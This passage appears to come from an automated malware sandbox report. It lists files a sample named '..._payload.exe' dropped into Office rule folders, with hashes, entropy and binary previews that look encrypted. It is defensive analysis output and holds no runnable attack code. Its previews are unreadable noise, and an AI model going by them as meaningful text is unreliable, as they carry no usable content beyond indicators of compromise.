                                                                                                                          Preview:<?xml.I.O.=Zq.AM..L.^.0.y....:1p...`...!.=-|uN,)...x....zE.X&..4.Jm*.b.u.....2.0.>.^....Q.Wt#@....N..`qY.1c...............X....S.}!.7...r.|..s..IFQv..^#.GR`4.....N.=F.D..:Kx5.O..?)........[......+>...."..A.{.m...^..Y...P>.Z.....X.{R1+..6W.Uy;.n..qO@.k3....../.j.1]..p.......y?w..Y....r.}.j..\*..y4...V."..o....q7...q.I..<Z..m%$+.)..R.H...8+[...D..&.eN...f.'-.!.....".ew.hO..KF.2... 7...:;..WP..OP.P."...?.x.D#.)..D.#....G..A..z.T.m9q..l.B.....5........-......DR...0KK9....Y...T.Q.#.^_.[..9..Xx.h......X8.lu.]...5hD./c...\.r..oM...m.66.."....$.z.o;V...7.k..>....|.%..6......v...d....s8.s..X......../...{...E..}.!....{rb.Q.h...../......~KT.;8.........[..#.8vo]Y.-hBf.M..5H..O.Nub...%..7V..q3H...^.+p.a7.........yH...%... ..n..&N..tj....4.r..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270010v3.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1612
                                                                                                                          Entropy (8bit):7.873462257953522
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:QnIJuSOOhrfwWjDaIcfzx4SchuVCHUOxKp88D:QFSOWfRaIc7x8QLp
                                                                                                                          MD5:9F141B82D2EAFE6B660E704DEC407716
                                                                                                                          SHA1:87F5B17AE20B7F1CE51E8CA672D2C6ED0B0ACC3B
                                                                                                                          SHA-256:3EC71207464E739FC35C3CE1F4D987077CF6F0AD8B35C1CEAD0A6E3D3DD28D8A
                                                                                                                          SHA-512:BEE787015706F31056E57FA4C663F926D0EA850BA36724BDB34B0C0D0862800017F5E78924EECA89737C572E280081A518D7ECA6033572E471EBF5628F9887E8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlmWU..G...Dm.qD...V....U.N.([.o.T.9:....\.....Q.7...&[..4.#KU.*`P.d..;...y.SP...S"...A..1.....:I..Yw.Wh@.E._.X..Xz.>E!..r...V.h......Bp.f1...u.G...=....n.......b.o,!..x>....:..O....F.0).n.aEi...MQ,...y.q.R....VB...]{....[k...=........xt..y......+.;...".......`Az.g.A...y..FL.....p..2...p{..<.5...dicRK#`...q..k........q...`...y./~.jm.\.l...aj.dE..4,m.j....Hc...X,+...3...^...y..R....K0H..j..>......[..hc.vH(.....+.o.{....R....c.)fDu.=y..LRq.e}.Y.tE..9.. ...4.!.. ...)..9.<9..@.g.Py........~n+..........Zp.....&.?..\}}1.nw. z`.e......`2...p.wt......m~h.K.._...y'....["..E..P..J;...FW.?...(R..>E.n..>.*g...{..5;.....2.X._.3=...$.a....tY...a..F.........5b}....x....9..L:..A...^Jf...G.#........y.G.l.S.d.k..B.Q."...+.b..a|p.#1..~*u......d...TB.H..*..n.!.n...g.......1cr..)N.r1.k.)..#.u.d.Z 9}e....Pc.m....:..D.up.J...RQ.!......-.1..l.'G.=.!`/..**-D.3....#..%...q......i..v.G.6\.|q.t...&=5...X<..@*.c.fJ. ..s8X".3..$..CUj@e..X<&d...!.N......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270011v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):747
                                                                                                                          Entropy (8bit):7.709168124193136
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:cgUWXXxZP8FqxxdkVFG43P+QXMKHNpF3ZB+NBBlAIq0Ki+uoKW8/wrk4Otq5bTcq:cgDjEFqxcDQsX3v8BfKZ8/R4fbD
                                                                                                                          MD5:723DEABDAAA0562154E177D873FFF48B
                                                                                                                          SHA1:4835F783D6F3E4C6131AF1DF47A8A447F5671F51
                                                                                                                          SHA-256:9C6FA801E4312218B4B8EE4B4ED5FE58486CE063C1870F3F33F0196912794531
                                                                                                                          SHA-512:9D05C722DE7E0271859167A956B614B9E8C35D7FCF7472072E9FE66BCECA23060450945CF49CB004CFD18735EAB2CAF71F1A6AF61EC82A8A6BECD5CB0707479D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...>....%.UP...h....=...\......t].&.H.?{..2..9<.0..Q.....A..'j..]....:....&...V=.K.....w...e..Q8e... ..#M.c.b#....t#{..u.....f<.>f.(....."..... .i.T=..v....;!c.!_.I.a.k..--.Q`.....6n.%VB..-.(R..a.m..........u...n.:|..7...;..b.:...o.v...`. .),4J8R...:%...-XaRiz....Ut..i...l1../......B.e....A...}k...^.....#..B.7YR.Y.*;.VS....[&7nl.....(,4V.O.#j..%.+. ...O...'...%p',0.u.....:....Fx......J%......p.......J......`.&.}....E.Y.+......r...p.....6M.!\f....>. ...*..el./k..b.x.7PT.[...Y...x.RWr_@`J.R.;....x6.....{.}......!.G......h...O...q.f`. ...s.$.BK:2....;....2'L.....bJS,.V...#..6..(S..yh....\...l.H..w2.P..]5i....D.h...~..K&...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270012v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):742
                                                                                                                          Entropy (8bit):7.691244691541788
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:IEb0SqzvC3g/ys0izpLnIExpz7YZmSiZq9cL7mTK82PcJ8lEJmhKp/N4ffP4hxtm:I+fevqgqKzpLn9xdKmy9cP2F8eJ4+Nqf
                                                                                                                          MD5:4BF681A80F2DF875A9D7D3193DE7CE66
                                                                                                                          SHA1:57FDF797169984392B60681215C65C3D514BFF98
                                                                                                                          SHA-256:05E63E5AAD83FC0F88859C623FB78A969DFB04E33E81CD14B18F1A6FCB97C26C
                                                                                                                          SHA-512:189F5DB3891F2BA650F78918D0F3DC7C63173A4096E01C3DB972BC5748D96DA7098573290929F028AA9CC1953A21905B30CCECDBD03A5636377BDF309CB778E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlu...a.-..q...[.....$...uy..y..A...i$.v.^..#.......M......{.....&.9'.S...qU..q...{....l.x@.eJ.Q..RM.$..E..X"_Zg..].3..^....Dl.)m4..L.}.v.J.I..;y(.:h.|r_..|.IS^c;.....o...C.....]."...oY;.d..].w..Nv.]!...o2...Xw....n.>._...m..G..l.bRR<x...].`Xn....a..ij.q.p.[q.~b...m.;...i.C.j?{+..I6..d`..=Z.<CL.V.vVj.....Ku..`..B..8.:,.+.'.3..<....g......8%U..~n.[j].-..8..<...9<Y........\c..:....Yn.k..Xyb)..WZ....l`....'T.M..n....%.j.C..n.\..j......u.^..[O.a.....bp|..B[.t...&..+...J.p...F9.0!r.U|.MV5..O5..mM..P..>).z.aQS.g...:m..C....\%.:"A(..-..e...fr.....C.{..D.W..Fw...%.....Q..3...K..1.....h.[...|.s_.6....+.d.H|m....s_.5q..5.kgd.8{p..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270013v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):756
                                                                                                                          Entropy (8bit):7.715230489378455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:R1QQhH3hx+xKfun8FX/YUB/Adco3xhEMXxrKC17nQh7qqeuDjVFcWKKIsvKhq5bj:b9RcxcXVYcy7E2xF1bQhuOVFKKIsNbD
                                                                                                                          MD5:8536BCD2E9D84E1D9055E7615ADF8308
                                                                                                                          SHA1:A6712BEA49F7B7A7514B943288B8A75297588FFF
                                                                                                                          SHA-256:7BD8836AF96363C28D943AB1FC514D4249831E7EAB58B9FD6626DB3130FD19F1
                                                                                                                          SHA-512:FDFE34C35D18378EE4D45C754DA8CB6F1DFE2B7087B917905D2134CC9455B706F9767A48B6D2E8B3CFE1C8A08A499A819CFF702602512CF41324F92207761BF8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml&.;S.....5IF.z...V..{U/...eGo..*..........C........+..j....j.7^.2.W..}.V...rvK-t.A4*Rqd.#w.}[...@.M../...l.A;.f..I....t."...v..E.f7.cUD..~.eN .WQY...0$..L.._...>.......=..1....a.x....H.^.... .....}..r........2.o......q.z3>W..........;.(..../b(...pw..5.V.D..1S........q.9.7.B.v....S..t.QST.t.m.;.?...j.h.I5.....:.Aa..;G...1O..kA..v.Q*...D..>ME.!........;.............r...'.&.$fk..=.ws...?.....JKA..a...xhV....!..4.._.)...k....?..}.....z.i`9.0>.B1...........dH.......?.....c.r.."....;..tk.Y.?@O....$.T}..7.MW....L.}.......y,@.Z....1....b.,/[..-f(@#.p.|.5..Q"(.p..s..t.=.t..K...?:..M.f..<D{...S.p......l...5..U.B..F...$p..4....F.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270014v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):763
                                                                                                                          Entropy (8bit):7.709953602135611
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:ojz7LkZPYwT0ejNDeBFU7FTVDyoJ/Vz8xcwuhT4OcUn0Rq5bTcii9a:oDL4NTR1eYJNciT4OjbD
                                                                                                                          MD5:7146FE7F1339415B7E145B68B04E65FE
                                                                                                                          SHA1:09699CB537DDF8C9B258FE594AB52CE72DB0C834
                                                                                                                          SHA-256:66ED708FF3E6B3661C138C38F0EDD4B03BFB21063F7114F36A9EAE3567B3B7FA
                                                                                                                          SHA-512:DF7D9A5E2ED7B963428C900BBA5462EAC2605C48FDCA5B7D9E8FDFD42ED98557857A72227228DA35A2282101ADAE09718A038939AA49650B6D7B7187916CAF05
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....h..!..L.Q%.....P...$....L>.~..*..k....t1C.....s...T$...9l.).r&P.v..79M*.G.>.).*;...b xH...v....XT.@.&...BYb.....IXS..8{..P#3H..q.L.)w.....ez.S1...{^l..R..c...f..Nv..`Z......Re.....x...?..:....!n...._.....Z..[.@g.9b-.a..V..2.D]......h?..G...(=.0...]Q.Q8.~..I.?H\.J.G7.5".K-d.=..Y......5o..T(.+(..c./<.?#+x..........._....`G7K...}(.Y..BF.R.K.%J..D..6.......e.0`Zq....t}..BY...a.......K..U...nVue.v.J/n..;M..>c.....`.....F...|..@X..|.C.o...i....W...VFE......ZR).;.5U%...2S=.Q3.i...B......?9/.C...2.R-.SM.."g&t...X..#...d.A...9..{Yt....o4..x....~....0<.\...4..l..].L..iP..l...M..;.?y.~......i.....&.X,.1....PP.........x..u.da;u.+.Bm....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270015v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):956
                                                                                                                          Entropy (8bit):7.746323725879298
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WSwI1AVBDFL0p3mdXwPFbTxKWWmdRbd2n1EvDuOxOIoBVgHhuuSGZR0bD:J8FL0JtKWWmd9d+1YxOIobgH8D
                                                                                                                          MD5:D392876B60AE93F07F7457188B204AF1
                                                                                                                          SHA1:33901ADFC806BB66ABD88A6F1C45E1A780D6522C
                                                                                                                          SHA-256:5DA1BC1C93E2CF432E8125A9AABA88EA0C1EB30A0B85EECE38189EFFE78EECDB
                                                                                                                          SHA-512:F5585BC56D3412142C89526DB796ACFC433262D944E3C8C36155737BC4BEBA3B551341F0B3D6723A1B46D5667F4B8E021294385AC5A3F5124DAC6F75BA9A0BF2
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml?0C>..^K.......sr.Tg...RN.x..`...%....J.....l\....#.g..d...u.J<.@.X.T..Q*.f\9..B1.......I...Y`..>.#b......!Ix..g.n...Q.....L'qa.....{..."bd..w.c.i.{.M+#..<.7.p.6.$k.. +...>Y.};..]..]f.@.....zO..it..s..#.pt...H$0.... ..p.hq%._[.Z..w..tCN.'C...p.O.5L..........lIa...&._v....J..;L...ZsV.O.$L...0.Q.:..g......DH..*.cw. N<''...Gs.-.....@..?...T..x..m).z..$....^X[....Q.).).S.iE.a.>g~wt.D...F>.h.j........~Rb....w..<..Z...7..D.w.....~....e.#..xi....f0......=\.<L ._..L......p0..2T.}q...Uw...rkL" TPD.R.B..S."..-Zh...-.vs.c.47.r.....Qf........n.E..wQ.XE..f..Z...ub.jG;`.!6.O.6...`..t.`...j.f8I...mR-.\5.}~D...k...o.L3...kt~C......21....[6.5.tL.~...&.$...ps...a2_v.....&EI......n....*.k8L.%....U!e.{.....=x...... 7................K....".@|q.y..J.c.<..&..<.....6.n.;NC..e.=......jBPNw..I,L.z<V.i.u......K..N.H1&...X...I.m..'/..P..$.6!Xh..3.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270016v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):837
                                                                                                                          Entropy (8bit):7.755884476208083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:UTmAEO2Uuat4PNrZKZxqp8gPJTNAE3f1EOcDAIqAoU9VQgUTEr05Q2LKuVEcx4qt:GKUuox+FNAzOc0IqPlTEr05+uVjbD
                                                                                                                          MD5:3675144D7B94C2F32CE569B1AFBB7998
                                                                                                                          SHA1:808E582C46ACDE2A203709909B3702D61F1B15F2
                                                                                                                          SHA-256:A3762A01DAD0F620A1042FD46BE0288605B26F9B63E611CEA884CB1E5D1E34BB
                                                                                                                          SHA-512:51E80F22DD745BE0EA395F50EEC5A65637D2E08CFA6B1CBB2442C064F269270E75EEA3BC9998B2BB2357AB364A9DF82D3C732319BF34A5C0BF0F6811BF81C274
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmli.._.?........9.........=...\).2./.....j.V|.DV...;|sU\s.h.Je~U.....C ...f....C>...o....Csi...A../..W..{...5L....u...u.W.P..k..O.m....?..(.-.2&..8.L.WA..V...Lv..{z.8.19-EMk..|.........4.w....G.n,.T.w.LK..c;`...b........=..K?/....2.....m....T/.K....{#._.T...........D/P..>..T............_.ln?.(..`gK5.0.....Z.V......F....*.ra>w.Tw.f.d....%.l..K.X..X.j......3.{...&l.|m.}St/...i...I.;m...r.v..clg.N_{e.....5+.....,...A.n,...k.*.l....ee........a+Y..|xu....F.B\.......X../-.W..`...&U.a?..J.?...mBy..V.w[.L{..lt.7..=.?.....jvH..k_..Y4^.o....0.\.i..8.cEU.."O..M.xO.+..q.XQ.M?=..q...Kw&{...)..b..]..........?..B...O...4...L.....;...i.....y.B..&..s......Y..\..a....N<..&....^..).Q@.tF...W.t?p.H.dg36|..n.R..Tw..g1....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270017v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):851
                                                                                                                          Entropy (8bit):7.6933548211230125
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:EqyHBs/0JFQA0514EFm2VmOU960v2xJ1bD:bIBsYFqf4EFNR0eTlD
                                                                                                                          MD5:CCFAB98AD6C09025E23EFAD883F41BBB
                                                                                                                          SHA1:3DD495AA7E86353A1FA5EB01A68F6A6B27042110
                                                                                                                          SHA-256:79946AC94BF107219C08E888EB777A813D6713D2F245799D2AC62DF958C85DF4
                                                                                                                          SHA-512:7CF5E585FA0EFBFFF37713F5B147583C7F3D590621187A7B22268D8CE124232537F6E110205846D7EFC7C9BA2024126C6A76824B7AF0991D6D65A09C851CFDBF
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.. cD.=..'.P.Lxz.....ID..j.S >...86....?..#..=..L..C.N.Xu..E.n12G...=..u..-.....lL?...7.5D84...]z....5.....aI7.[..E....c."..CT.a.h.}..I`L.=.n".....=..qt0.^.y..X............f...I..F.....Z..Hgk..}I.......sK..2<..].C.s....m$B...VC.[.T....7...`.N,.p6m..`.M*sz........N.4......EW.g.[.....X..FrW.D.....+...... @..H.uX...y.$..1.......l}.(..f..&i.e.dr..x.........ua......G.B..h....k..WB.......VH...s:.4S.e..6a...u.s.#....,.......z....u66T...N.{..j.K-.e.[!.sa.O....6A...3.0.'I.H.j.[..0...A...rRN..M..D.]@..[....t8M.!.2.....?.f.r...He.y.u.%..jG..L...i..a...g...\..3%^..&>3i.>....E..-#@......4...oG....Y..9.1...<.z<W..o.mO..J...S.C*...)....\.\.<"B...E...._.xE!...."..Q..dY.g.g.....v.9..C..qV.f....7tY...`.'......eR......Ep.Z......A......O.....!...$phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270018v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):956
                                                                                                                          Entropy (8bit):7.785391920592236
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:kOJaUTPsTKzLd50Fw0p+IY3pHysNwKq2bD:kOzU+P0+k+IEpvNwKqkD
                                                                                                                          MD5:0DBE25F4E17EC4C37F836C86F2DF3EFD
                                                                                                                          SHA1:2934024AFAB3F3221082E1C7B6A37C9DA4AA3947
                                                                                                                          SHA-256:53A3B3DFBE0988E1AF577680E38DCFE8F87581B6F677A5926521B3CACEC0FD1B
                                                                                                                          SHA-512:E01B0CF7FAA6E51C588F9999F11AABFEE23EEFA77D22541C534CB5FCD38B9FC6E86B10EFED0069EF44764314652542A2EF0EAE28A07710DD557496D1ECC4312C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....&..xw8.y..~.....8...V.6......#^j...P..yE.h.x.E.&N.\8.N......_.`..ie.S.C.... ...h....y.r.cs..4...Rn..U5..!64 9.....{_..Z.._.q[....#..vRo.......@....`..e.l...W..j.:.7..p....[z.r;....C.<...S.q....J`._o..x......m=./:...,g.......`....\+...6...V%...s.'....)....:..0j...MK..q5....|.>..N..].5.l........:.,.3XM..L.K^.._...E..|..=.Ns...[...ma....../`.t..Y..eo.EM@7.K.....9`.eU....e3..5/I..b..32..B..]).)....fH.H..'.y........Ib..B.....m"......8.{....3.%5F.?.[.W..sr.>........-.E*.jq.w....U..?....3=f....h5...m.d..b......-R...1......`*Z...<..b.).L1.........7..W. R....A.&.rg~n..n5.|....X......0..i:....5%.R.-...6^I$...^.^.o..B.6.Y..RMM3..y^..2.....kQG...m.6...?...)3h.......<.Q..E.L.>......x..H..(.F.?..e..a..$>......OE\BeC...?o~|>0ve?KD...W......!ERr|..}.Tjl.Y$...t.r..g.....m.....*.G.1..F..W......c..W.U......y/.t_.r......V........M0O@...d.PphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270019v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1135
                                                                                                                          Entropy (8bit):7.827299298145994
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:jOMVYPM8h9XHVANj2UQjPGsxBfYNSWai2ozcmEatE384SmYmYbD:j18h9X1As1SsxBwNSWai2cSs47pCD
                                                                                                                          MD5:9FD1443540A71480BD2DFA31E35E1D8B
                                                                                                                          SHA1:ADEA97A289F02A0019DC4A4FBA26BB0A9704CC07
                                                                                                                          SHA-256:341B971A33BC88DD2484D6CDDADF17D9F3BE15F9F2D33ACA60F0561E3836F6A4
                                                                                                                          SHA-512:CEE3051FCF1847C3415C8971D1BCA9DFDEF1A23600C6D6E3E3678217715C4728A1CA435C31B1A84AEC6B7E7D5CD1DC3E9FC980DA43543380F55D618189828718
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....r:I....}.&..0...;.j..&....q.....^..\N....;X..7....t..o...'r..].......YX'.f..jrg..s.ycV0..A..(..._!*...dV.v..z.I.~5a.=...eG.H.#.j..m. .e:..i..9.Z..~a...QQ+ ...`y..H:.v......D{.4.w.G\.q.......m.......Y.=.....&....eN..Gi.....M.#@v....9.Y.T..+O.&.B..r...w.`.F....+?*...m...Y....n..Trb7.)w..6)~..-..`.':.!W...........Y.ag\y...V9...0...'...0C.....).t(.K&.T.._.....A.-@n....J.......T.i..P..D..rUq7..M..6.U. ....X5.....T.P....,.G..)..W..........mde...o....&....:...g..4...C....g0...I..\....0..6+...9.+k...0A.....V.y....M..)...yo.W<S..:7.$..V...@.y.b......K.J.._k,?W..Y>.)k.x.U8.`,.....fL....AW.>^..vP.vF] ......{?......N..n..Z.U^...+..~3.V...`.P..M...7:=.i+c..iAO...].j.b>.......".NH%sPr...2H.R..'....L.....k.g..T.D..X|2.i.d......]....h..*!..%.P5%OnN...T....m..`..>#W..up%....|.~....N...7bV2.....Z{. .a.../U.......i.V........=[w7lY.C.......0.....#.... .l.-a8...2..-...1-.7...c..D..b.....?..<:sz.../.".y8.P.y..z...y...^....c..^h..u^.....n.nAv.wcTEy.4#.h...Q

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule310000v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1869
                                                                                                                          Entropy (8bit):7.8993468681295775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:1dxMay8GWVnIrW2xZxgoRBJKQeIWwFBeID:1HazmnIK27xgEJuIsU
                                                                                                                          MD5:6DC73DC4757D349831EBB826A7BEF977
                                                                                                                          SHA1:0DA36FEC7AD5332BCE7ACE92F593B7934AAA3CC7
                                                                                                                          SHA-256:497FAD82B7F1206F0E584206F1CE42769ABC3BCF07300F02B8672069E730B0DC
                                                                                                                          SHA-512:B41F935793A68E05C9648669C1AF5EB2220F7BB8B7611E4C28C542C2DE18D43D4C39B0991A15791DAF0C96FD265AF3ADFD2825E920FA05CA2ED9190777CC8647
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..V.! ..T...Sp,.I.e.B.........VYn..2M...Y:.dFL[..=.tf6...d&)....!..4Fv.a.(._....K..._,.5P....K..D.O.?.e\..|.S"u.@.=..b.M.j..5...[.v.L.p...?...........Xn.nB.c.,.z/g.g..N.L.p.@@.q.....y........^..+....s.2..$.........V..>H-[.9U..C.R.9.i>....i..}I.,..P.).h.9...PO....r`.l...u..g......>.T.W.-"s|......f.Q...Y>%...y....5...O!...D.i......0.......5.M..3@|.D.....G.j.kc..F|82.........Hn..nh..6"Mo..J|..2...sP.w..........'/....F...0.4mN.n...3;L..PK.7....n...h..K.g.....t.......]}..).M.88......h.J..*.....+.v.8{....!..C......^R..,O..... .B~<..7...;..J/..y..vY..ME.N.cq...k..'yZJ5}..[...b>..u....V...qr.%>_(..5..\.2T....M.4.9.).]i.^&^]...x..7..\..JR.......g...a.......4..R8.`!...B..i...C....;.>....8.....n.&H.~2/...r...g..$.R... .2KP.cBq2.G]4.O.O...nV....|..i........<...............1ej..B...%E{...</,....)I....N&.Z.L......7..Q..p.....g^.$..z2./..?......].#......@.......k...w;......WOx.e...y".......R.Lni...prd...mo^.d.D...C.XP+Xl4.0'.>.......a4.....r.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320001v2.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1358
                                                                                                                          Entropy (8bit):7.853934531028087
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:/FBpBDsUaezEsdvPbtQ4dWbfSfIfr1FNcxdMhEVPXSkZ+xD7wNC6DFtbD:/FBTbzEsdvPxrafXJcMhiPSkop7wM6bD
                                                                                                                          MD5:2DA929FFACB4FDC1B330D0121D9FC5B1
                                                                                                                          SHA1:4044DCD0756E3D086A9675E381E9533227828758
                                                                                                                          SHA-256:923AC96C9F6A8A583FC0140BC945E99B1E122E370A0D3151809C99A4FC7CE033
                                                                                                                          SHA-512:8EB493541E4A21F41748B1233A1AC25FF82589DCA051E9AB359E81D7ECE609AA09058070EC9FCE1016B0FFD60D1286AF8CAABA28869D5BABD74C7BC28CCE658B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml1....PA...$m....^....zsk....|.~.<J..:47..]..Z.z4k..C..2....,....;..&...+[..LP`GP..z;C..y.O..5a.../...T.......G.....J@..=..Wv.....6$&...3.iL...9.$....L..o....r..K.$.2..<..a. ..d=.. .bb....Ss..5{..c....{..4.Yc........gy}M.......z.}..H.X.5..U^;.i.Z5....).t.F......$...%TJ..[.Y...*8.<.(.....3....Xo...Lv8.Y........*Nt..U..N.y.........Xh\.yT..r......E[.Np(...fL.TJw.\?..CO.%E..%9.)..d.;..../.....H..LZ...:a?...m..P.Q1./....I'.....>z..M=.b.....0.{?-.Y|.q...]R.$eV....;....4..4.....F....F.c............s.O...1/W.9....ZJ....QwM.bR.N&.>....V...9o...K......,..'.....i.^...'.ku_.?...Z..&].....Q...|...K.[.;.*..v.Y.RX2?.n:c.V.u-.=......?....L..o.(.E...{.....X.N..........gy....A..n..h.3.(.....t...|.!.?Hq...i...`.]..*......+..7..3.T..3BP:|T...1x.k?..kA..%80..3.}j.XB.$..tj.^I..=.q$.P(Iy...'er:C.s...o..Xr.e.N9.Z/.>..H.=x..P...%... ..p.|.Z..J...........).....]>`>.A...|.1..R.V}8..............;.=....!.........DpM..l..'..wr.V..nt.G.P..z...b..k.T...>W..E.Rv

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320002v5.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1892
                                                                                                                          Entropy (8bit):7.901295692154198
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Ys1RWFnwiWBANHlwFQIZw7YEeWznjclAUTX9GH3OniyDYbjD:71QFnXTQte+QnjGAUTNGE5Ybv
                                                                                                                          MD5:550590AD1D312BA21C02A5432343C32E
                                                                                                                          SHA1:CB53D9D645BFC63F53ACB98918E3D3BB0901D564
                                                                                                                          SHA-256:D7D84C540BA9DCFBC5D48E1EDF4D4F5550B2E2518B776D5C27FF679D07A9476E
                                                                                                                          SHA-512:9C3F6D8AE0459356EB69BDB4B28A928262F7101059E2E91C0E2F9B63A780F8DC003CD91CD06B9971FD1E2073DC0DCC179E2519230BC7E840C77909E18A33E385
